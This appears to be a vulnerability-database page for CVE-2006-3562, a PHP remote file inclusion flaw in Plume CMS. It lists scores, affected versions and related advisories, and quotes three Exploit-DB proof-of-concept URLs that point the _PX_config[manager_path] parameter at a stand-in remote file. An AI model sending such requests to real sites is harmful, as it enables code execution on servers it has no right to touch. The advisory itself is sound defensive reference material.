CVE-2006-3562
Published 2006-07-13
CVE-2006-3562: PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path]…
Priority: P337 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.06% (85.9th percentile)
PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path] parameter to (1) index.php, (2) rss.php, or (3) search.php, a different set of vectors and versions than CVE-2006-2645 and CVE-2006-0725.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| plume-cms | plume_cms | <= 1.0.6 | — |
| plume-cms | plume_cms | — | — |
| plume-cms | plume_cms | — | — |
GHSA
GHSA-9rrg-ppwx-5r5f: Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2006-4533 [MEDIUM] CWE-94 GHSA-9rrg-ppwx-5r5f: Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1
Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1.0.6 and earlier allow remote attackers to execute arbitrary PHP code via the _PX_config[manager_path] parameter to (1) articles.php, (2) categories.php, (3) news.php, (4) prefs.php, (5) sites.php, (6) subtypes.php, (7) users.php, (8) xmedia.php, (9) frontinc/class.template.php, (10) inc/lib.text.php, (11) install/index.php, (12) install/upgrade.php, and (13) tools/htaccess/index.php. NOTE: other vectors are covered by CVE-2006-3562, CVE-2006-2645, and CVE-2006-0725.
GHSA
GHSA-vr4r-48mr-4g42: PHP remote file inclusion vulnerabilities in plume cms 1
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2006-3562 [MEDIUM] CWE-94 GHSA-vr4r-48mr-4g42: PHP remote file inclusion vulnerabilities in plume cms 1
PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path] parameter to (1) index.php, (2) rss.php, or (3) search.php, a different set of vectors and versions than CVE-2006-2645 and CVE-2006-0725.
No detection rules found.
Exploit-DB
Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2007-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcode.txt?
Exploit-DB
Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2007-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.txt?
Exploit-DB
Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2006-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?
No writeups or analysis indexed.
http://securityreason.com/securityalert/1220
http://securitytracker.com/id?1016426
http://www.securityfocus.com/archive/1/438948/100/100/threaded
http://www.securityfocus.com/bid/18780
https://exchange.xforce.ibmcloud.com/vulnerabilities/27530